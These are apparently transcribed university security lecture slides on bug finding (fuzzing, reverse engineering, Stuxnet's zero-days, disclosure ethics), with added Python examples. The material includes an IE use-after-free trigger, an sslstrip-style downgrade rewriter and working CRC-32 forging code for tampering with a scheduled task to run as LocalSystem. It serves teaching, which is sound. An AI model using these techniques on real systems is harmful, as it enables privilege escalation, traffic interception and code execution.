Bug Finding In The Real World

Alex Stamos

Aaron Grattafiori

Stanford CS155

April 17, 2012

Your Humble Narrators

  • Alex Stamos

    • Co-Founder and CTO

    • LBNL, Loudcloud, @stake

    • UC Berkeley BS EECS

  • Aaron Grattafiori

    • Senior Security Consultant

    • Security Innovation, MyBasement

    • UC HardKnox BS


  • Why are you finding bugs?

  • Overview of common techniques

    • Fuzzing

    • Debugging and Process Stalking

    • Reverse Engineering

  • Real World Examples

  • Ethics and Advice

  • Discussion

Why are you finding bugs?

(Diagram of bug-finding approaches; labels recoverable from the slide: Stolen Source Review, Static Analysis, Source Review)

Bertha the Black Hat of Ill Repute

  • Goal

    • Dependable Exploitation

    • Stealth

  • Thoroughness

    • Usually only need one bug

    • No need to document coverage

  • Access

    • Often no source

Marvin the Megalomaniacal Researcher

  • Goal

    • Column inches from press, props from friends

    • Preferably in a trendy platform

    • Make money from ZDI/Pwn2Own

  • Thoroughness

    • Don’t need to be perfect, don’t want to be embarrassed

  • Access

    • Casual access to engineers

    • Source == Lawyers

Sally the Stressed Security Engineer

  • Goal

    • Find as many flaws as possible

    • Reduce incidence of exploitation*

  • Thoroughness

    • Must have coverage metrics

    • Should at least find low-hanging fruit

  • Access

    • Source code, debug symbols, engineers

    • Money for tools and staff

The Difficulty of Defense

So, oft in theologic wars
The disputants, I ween,
Rail on in utter ignorance
Of what each other mean,
And prate about an Elephant
Not one of them has seen!

(John Godfrey Saxe, “The Blind Men and the Elephant”)

The Difficulty of Defense

  • Asymmetric Warfare

    • Defenders always have to be perfect

    • Attackers can be good and lucky

  • Knowing this, is bug finding an efficient defense strategy?

Limitations of Today’s Lecture

  • The most important flaws we find are NOT implementation flaws

  • Common problems:

    • Trusting untrusted components

    • Poor use of cryptography

    • Overreliance on DRM

    • Forgotten or cut security features

Black Box Bug Finding

  • Basic goal is to exercise all states of software while watching for a response that indicates vulnerability


“Smarter Fuzzing”

  • Record or implement path through gating functions

  • Utilize knowledge of protocol or file format

  • Use process hooking
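The two slides above (black-box fuzzing, then “smarter” fuzzing that gets past gating functions using format knowledge) are easiest to see side by side. The following is an added example, not code from the lecture: a constructed toy file format whose parser has a CRC-32 gate in front of a record loop that trusts the count field, and a mutation fuzzer run twice, once blindly and once recomputing the checksum after every mutation. The format, the parser bug and the mutation strategy are all assumptions made for this example.

```python
import random
import struct
import zlib

# Constructed toy file format (an assumption for this example, not a format from the slides):
#   "FZ" | u16 record count | records of (u8 tag, u8 len, len bytes) | u32 CRC-32 of everything before it
MAGIC = b"FZ"


def build_file(records):
    """Serialize [(tag, payload), ...] into the toy format with a valid trailing CRC."""
    body = MAGIC + struct.pack("<H", len(records))
    for tag, payload in records:
        body += struct.pack("<BB", tag, len(payload)) + payload
    return body + struct.pack("<I", zlib.crc32(body))


def parse_file(data):
    """Target under test. The CRC check is the gating function; the record loop
    trusts the count/length fields and reads past the end of the buffer
    (IndexError here, an out-of-bounds read in a C parser)."""
    if len(data) < 8 or data[:2] != MAGIC:
        raise ValueError("bad header")
    body, crc = data[:-4], struct.unpack("<I", data[-4:])[0]
    if zlib.crc32(body) != crc:
        raise ValueError("bad crc")
    count = struct.unpack("<H", body[2:4])[0]
    records, off = [], 4
    for _ in range(count):
        tag, ln = body[off], body[off + 1]
        records.append((tag, body[off + 2:off + 2 + ln]))
        off += 2 + ln
    return records


def mutate(seed, rng, fixup):
    """Random byte overwrites and deletions. With fixup=True the trailing CRC is
    recomputed afterwards so the case survives the checksum gate."""
    body = bytearray(seed[:-4] if fixup else seed)
    for _ in range(rng.randint(1, 4)):
        i = rng.randrange(len(body))
        r = rng.random()
        if r < 0.5:
            body[i] = rng.randrange(256)
        elif r < 0.8:
            body[i] = rng.choice((0x00, 0x7F, 0x80, 0xFF))  # boundary values
        else:
            del body[i]
    body = bytes(body)
    if fixup:
        body += struct.pack("<I", zlib.crc32(body))
    return body


def fuzz(seed, iterations=2000, fixup=True, rng_seed=1):
    """One fuzzing run. 'gated' counts inputs the parser rejected before reaching
    the interesting code; 'crashes' counts out-of-bounds reads in the record loop."""
    rng = random.Random(rng_seed)
    crashes, gated = [], 0
    for _ in range(iterations):
        case = mutate(seed, rng, fixup)
        try:
            parse_file(case)
        except ValueError:
            gated += 1
        except IndexError:
            crashes.append(case)
    return {"crashes": len(crashes), "gated": gated, "cases": crashes[:5]}


SEED = build_file([(1, b"abc"), (2, b"hello")])

if __name__ == "__main__":
    for fixup in (False, True):
        res = fuzz(SEED, fixup=fixup)
        print(f"fixup={fixup}: crashes={res['crashes']} gated={res['gated']}")
```

The blind run is almost entirely rejected at the CRC check, so the record loop is never exercised; the run that knows the format reaches it within a few hundred cases. In a real target the same fix-up step is what a recorded path through the gating functions, or a process hook that patches the check out, buys you.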


Reverse Engineering

  • Decompilation

    • Works best on bytecode (“semi-compiled”) targets, where names and types survive

      • .Net CLR

      • Java

      • Flash

    • Can work with C++ w/ symbols

  • Disassembly

    • 1:1 matching with machine code

    • Modern disassemblers allow for highly automated analysis process

  • Protocol Reverse Engineering

Disassembly - IDA Pro

Reversing Patches - BinDiff

Defeating Black Box Bug Analysis

  • Many programs include anti-debug functionality

    • Check the PEB (BeingDebugged flag)

    • System calls that reveal a debugger (e.g. IsDebuggerPresent, NtQueryInformationProcess); scan the process’s own memory for breakpoints

    • Raise INTs / exceptions and test whether the handler is reached (a debugger swallows them)

    • Timing tests (single-stepped or breakpointed code takes measurably longer)

  • Anti-Reversing

    • Dynamic Unpacking

    • Pointer Arithmetic

    • Encrypted and obfuscated function calls

Anti-Anti-Debug - Snitch

Snitch Output on WMP

Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)
Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)
Exception handler 2 is at 0x7c839ac0 (kernel32.dll)
Potential break-point debugger check at 0x4bf9f9fc (blackbox.dll)
Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)
Exception handler 2 is at 0x7c839ac0 (kernel32.dll)
Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)
Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)
Exception handler 2 is at 0x7c839ac0 (kernel32.dll)
Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)
Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)
Exception handler 2 is at 0x7c839ac0 (kernel32.dll)
Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)
Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)
Exception handler 2 is at 0x7c839ac0 (kernel32.dll)
Potential OutputDebugString debugger check at 0x7c812aeb
Module: \Device\HarddiskVolume1\WINDOWS\system32\kernel32.dll
Potential break-point debugger check at 0x4df75f36 (drmv2clt.dll)
Exception handler 1 is at 0x4dfda68e (drmv2clt.dll)
Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

White Box Bug Finding

  • Black Box techniques always work better with more context

    • More quickly triage flaws

    • Patch flaws much faster

  • Analysis can start with source code

    • Look at sensitive areas

    • Use lexical (pattern-matching) analysis to point at risky calls

      • Flawfinder

      • RATS

    • Use semantic analysis

      • Coverity

      • Fortify

  • Most White Box techniques also increase the false-positive count

Hard to Find Bugs

  • MS10-002 – Remote Code Execution in IE 5-8

    // IE-only JScript syntax for an event handler; this is the trigger, not a full exploit
    function window::onload() {
        var SourceElement = document.createElement("div");
        document.body.appendChild(SourceElement);
        var SavedEvent = null;
        SourceElement.onclick = function () {
            // Keep a copy of the event object, then free the element it refers to
            SavedEvent = document.createEventObject(event);
            document.body.removeChild(event.srcElement);
        };
        SourceElement.fireEvent("onclick");
        // srcElement still points at the freed element: a use-after-free
        SourceElement = SavedEvent.srcElement;
    }


Hard to Find Bugs

  • How does this become a reliable exploit?

    • Heap spraying allows for predictable control of memory space

    • IE Small Block Manager Reuses Pages

    • Asynchronous Garbage Collection can be synchronized by attacker: CollectGarbage()

  • How about on more modern OSes?

    • ASLR and DEP defeated with Flash JIT

    • Return Oriented Programming


  • Good analyses of Aurora Exploit:



Future of Bug Finding

  • How could you find this bug?

    • Requires understanding of IE code

    • Difficult to triage

  • Low-Hanging Fruit is Gone

    • This bug has existed since IE5

  • Initial flaw can be found by smart fuzzing. How would you do that?

  • Exploitation should require 2-3 flaws for reliability

Jailbreaking; honorable exploitation

  • A tale of incentives

  • Apple continues to take steps to prevent jailbreaks.

  • Android takes a somewhat different approach, yet still gets jailbroken (rooted)

  • Jailbreaking of: TVs? Cars? Houses? Robots?

    (ps. comex now works at Apple)

Bugs and Exploits in the Wild

Crypto doesn’t fail, the implementations do…*

  • Browsers don’t know a site is SSL-only unless the site forces them to use it.

  • Man-in-the-middle attacks are possible… but… my site is over SSL you say!

    • Most sites reach SSL via a plaintext HTTP request that is answered with a 302 redirect to https://

  • UI’s are hard to get right…

    • Browsers only indicate insecurity when security was used in the first place

  • Moxie Marlinspike pointed out the gorilla in the room. Enter SSL Stripping:

    • https://github.com/moxie0/sslstrip

    • http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

* http://rdist.root.org/2010/11/19/dsa-requirements-for-random-k-value/

* https://en.wikinews.org/wiki/Predictable_random_number_generator_discovered_in_the_Debian_version_of_OpenSSL


  • Tricky problem to solve…

  • HTTP Strict Transport Security (HSTS) is gaining traction

  • Google’s SPDY requires the use of SSL

  • Security at lower OSI layers?
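To make the stripping attack and the HSTS mitigation concrete, here is an added example (not code from the lecture or from the sslstrip project): a minimal sslstrip-style rewriter that downgrades the 302 redirect and every https:// link in a page while remembering which URLs it stripped, next to a client-side HSTS policy that rewrites plaintext URLs for known hosts before any request is sent. The sample responses and the host name bank.example are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample traffic (not real captures): the plaintext request a browser makes
# when the user types a bare hostname, and the page the site serves after the 302.
UPSTREAM_REDIRECT = (302, {"Location": "https://bank.example/login"}, b"")
UPSTREAM_PAGE = (200, {"Content-Type": "text/html"},
                 b'<form action="https://bank.example/login" method="post">'
                 b'<a href="https://bank.example/help">help</a></form>')

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


class StripProxy:
    """Minimal sslstrip-style rewriter. The proxy keeps TLS on its own leg to the
    server and hands the client a plaintext copy, remembering what it downgraded."""

    def __init__(self):
        self.stripped = set()

    def _downgrade(self, url):
        self.stripped.add(url)
        return "http://" + url[len("https://"):]

    def rewrite(self, status, headers, body):
        headers = dict(headers)
        loc = headers.get("Location", "")
        if status in (301, 302, 303, 307, 308) and loc.startswith("https://"):
            headers["Location"] = self._downgrade(loc)
        # A cookie marked Secure would never be sent back over the stripped connection,
        # so the attacker drops the flag as well.
        if "Set-Cookie" in headers:
            headers["Set-Cookie"] = re.sub(r";\s*[Ss]ecure", "", headers["Set-Cookie"])
        text = body.decode("utf-8", "replace")
        text = HTTPS_URL.sub(lambda m: self._downgrade(m.group(0)), text)
        return status, headers, text.encode()

    def upstream_url(self, client_url):
        """The client asks for the plaintext URL; the proxy fetches the https one it stripped."""
        https = "https://" + client_url[len("http://"):]
        return https if https in self.stripped else client_url


class HstsClient:
    """Browser-side mitigation: once a host has been seen with Strict-Transport-Security
    (or is preloaded), plaintext URLs for it are upgraded before any request goes out.
    On a first visit with no preload entry the client is still strippable."""

    def __init__(self, preload=()):
        self.known = set(preload)

    def remember(self, host, headers):
        if "Strict-Transport-Security" in headers:
            self.known.add(host)

    def request_url(self, url):
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in self.known:
            return url.replace("http://", "https://", 1)
        return url


if __name__ == "__main__":
    proxy = StripProxy()
    print(proxy.rewrite(*UPSTREAM_REDIRECT)[1]["Location"])
    print(proxy.rewrite(*UPSTREAM_PAGE)[2].decode())
    client = HstsClient(preload=["bank.example"])
    print(client.request_url("http://bank.example/login"))
```

The point the HstsClient makes is the one behind “tricky problem to solve”: the header only protects a host the browser has already seen over a real TLS connection or has in a preload list, so the very first plaintext request is exactly the one sslstrip needs.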

Bugs and Exploits in the Wild

  • Hactivism

    • Anonymous vs <insert flavor of week>

    • “Hacktivist groups were responsible for 58% of all data stolen last year” – Verizon 2012 Data Breach report

    • Victims of opportunity

  • Outcomes

    • Exposure of client info, customer info, usernames, passwords, sensitive information

    • Damage focusing on the reputation and data exposure

Bugs and Exploits in the Wild

  • Stuxnet

    • [ worm [ rootkit [ rootkit [ sabotage ] ] ] ]

    • Four zero-day vulnerabilities

    • Two stolen certificates

    • Eight propagation methods

    • Partridge in a malware pear tree

Did you say… Four OH-days?

Redundant: enough exploits to cover a mixed Windows environment

Reliable: several of the bugs are logic flaws rather than memory corruption



Lets overview…


Vulnerability Fruit Punch

  • Zero-Day* Vulnerabilities:

    • MS08-067 (NetPathCanonicalize()), (Patched)

      • http://www.phreedom.org/blog/2008/decompiling-ms08-067/

    • MS10-046 (Shell LNK / Shortcut)

    • MS10-061 (Print Spooler Service)

    • MS10-073 (Win32K Keyboard Layout)

    • MS10-092 (Task Scheduler)

    • CVE-2010-2772 (Siemens SIMATIC Static Password)

MS 10-061 aka CVE-2010-2729

  • Kaspersky mentioned to Microsoft they saw printer enumeration during network propagation

  • Using the guest account, Stuxnet “prints” to a file into: \Windows\System32

  • This only allows file writing… not remote execution

  • Enter MOF (Managed Object Format)


  • Confusing chain of Microsoft buzzwords: WMI automatically compiles any MOF file dropped into

  • Windows\System32\wbem\mof\ (so the file write becomes code execution)

  • Metasploit module available (ms10_061_spoolss.rb)

MS 10-092 aka CVE-2010-3338

  • Windows >= Vista scheduled tasks in an XML format

    • Pre Vista used ???

  • Users can write and edit their own tasks; a CRC32 of the file is the integrity check

  • …….. CRC32 …. (a CRC is not a MAC: anyone can make an edited file produce the same value)

MS 10-092 continued…

  • Created task as normal user, record CRC32 value

  • Modified user definition in the task to LocalSystem

  • Take CRC32 of the task XML, pad until the CRC32 matches original

  • ?????

  • Profit
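The slide describes padding the edited task until its CRC32 matches the recorded one. Because CRC-32 is linear, you do not have to search: four appended bytes can be computed directly for any target value. The following is an added example (not code from the lecture or from the Metasploit module) showing that computation on a constructed task definition, next to what the check should have been. The XML and the key are assumptions; whether the four bytes can be placed somewhere the real Task Scheduler parser tolerates is a detail the slides do not cover, so the example works on raw bytes.

```python
import hashlib
import hmac
import zlib


def _crc_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _crc_table()
# For this polynomial the high byte of each table row is unique, so a row can be
# looked up from the high byte of a register value. That is what makes forging cheap.
ROW_BY_HIGH_BYTE = {row >> 24: k for k, row in enumerate(TABLE)}


def forge_suffix(data, target_crc):
    """Return 4 bytes such that zlib.crc32(data + suffix) == target_crc.
    Walks backwards from the wanted register value to pick the table row each of
    the four update steps must use, then forwards from the real register to find
    the input byte that selects each row."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF           # raw register after `data`
    want = target_crc ^ 0xFFFFFFFF                # raw register we must end on
    rows = []
    for _ in range(4):
        k = ROW_BY_HIGH_BYTE[want >> 24]
        rows.append(k)
        want = ((want ^ TABLE[k]) << 8) & 0xFFFFFFFF   # undo one update; the low byte is not needed
    suffix = bytearray()
    for k in reversed(rows):
        suffix.append((reg ^ k) & 0xFF)           # the byte b with (reg ^ b) & 0xFF == k
        reg = TABLE[k] ^ (reg >> 8)               # standard per-byte CRC-32 update
    return bytes(suffix)


def crc_is(data, target_crc):
    return zlib.crc32(data) == target_crc


# Constructed task definition (an assumption; real Task Scheduler XML is larger).
ORIGINAL_TASK = (b"<Task><Principals><Principal><UserId>alice</UserId></Principal></Principals>"
                 b"<Actions><Exec><Command>C:\\tools\\backup.exe</Command></Exec></Actions></Task>")
# The edit from the slide: run the task as LocalSystem (well-known SID S-1-5-18).
TAMPERED_TASK = ORIGINAL_TASK.replace(b"<UserId>alice</UserId>", b"<UserId>S-1-5-18</UserId>")


def forge_task(original, tampered):
    """What the attacker does: make the edited file keep the CRC-32 recorded for the original."""
    return tampered + forge_suffix(tampered, zlib.crc32(original))


def mac_task(key, task):
    """What the check should have been: a keyed MAC the attacker cannot recompute."""
    return hmac.new(key, task, hashlib.sha256).hexdigest()


if __name__ == "__main__":
    forged = forge_task(ORIGINAL_TASK, TAMPERED_TASK)
    print(hex(zlib.crc32(ORIGINAL_TASK)), hex(zlib.crc32(forged)))
    print(mac_task(b"system-secret", ORIGINAL_TASK) == mac_task(b"system-secret", forged))
```

This is the general form of the attack: any integrity check built from a linear checksum can be satisfied with a few bytes of computed padding, which is why “design exploitation is 99% reliable” on the next slide.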


  • Memory Corruption exploitation is difficult

  • Design exploitation is 99% reliable

  • Complex Systems will always have vulnerabilities

  • Was stuxnet a…. Cyb3R W34PoN?

  • Good Watching:

    • Bruce Dang, Microsoft “Adventures in Analyzing Stuxnet” @ 27C3

      • https://www.youtube.com/watch?v=fVNHX1Hrr6w (NSFW Language)

  • Good reading:

    • http://www.symantec.com/connect/blogs/w32stuxnet-dossier

    • http://www.eset.com/resources/white-papers/Stuxnet_Under_the_Microscope.pdf


  • Big ethical debates used to be:

    Responsible vs Full Disclosure

  • Debate has shifted to:

    Disclosure vs Selling Weapons

Some Advice

  • Shape your job around your ethical standpoint, not vice versa

  • Take a startup job while this is your primary expense:

  • Find a stretch position… and stretch

More Reading

  • Shellcoder’s Handbook
Thank you for coming!

alex@isecpartners.com

